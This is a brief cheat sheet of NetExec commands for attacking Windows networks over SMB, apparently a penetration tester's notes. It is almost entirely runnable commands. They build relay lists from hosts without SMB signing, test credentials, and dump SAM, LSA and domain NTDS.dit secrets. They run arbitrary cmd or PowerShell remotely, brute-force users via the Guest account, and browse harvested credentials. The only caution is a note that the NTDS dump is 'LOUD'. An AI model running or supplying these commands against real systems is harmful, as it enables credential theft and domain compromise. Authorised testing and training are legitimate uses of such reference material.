NetExec

Similar Syntax to CME

Find ip/hostname/SMB Signinig/etc:

netexec smb targets.txt

Generate a list of SMB Signing disabled for relays

netexec smb targets.txt --gen-relay-list relay.txt

Find hosts user can log into/is admin on

netexec smb targets.txt -u user -p 'password'

Enumerate shares

netexec smb ip -u user -p 'password' --shares

Dump SAM

netexec smb ip -u user -p 'password' --sam

Dump LSA

netexec smb ip -u user -p 'password' --lsa

Pass cmd

netexec smb ip -u user -p 'password' -x 'command'

Pass powershell

netexec smb ip -u user -p 'password' -X 'command'

List users if Guest account is enabled

netexec smb (ip) -u 'Guest' -p '' --rid-brute

Look at domain admins

netexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'

Look at logged on users

netexec smb ip -u user -p 'password' --loggedon-users

Look at NTDS.dit - is LOUD - USE WITH CAUTION

netexec smb dc-ip -u domain-admin-user -p 'password' --ntds

Database

View database

nxcdb

View creds grabbed via SMB

proto smb
creds

Last updated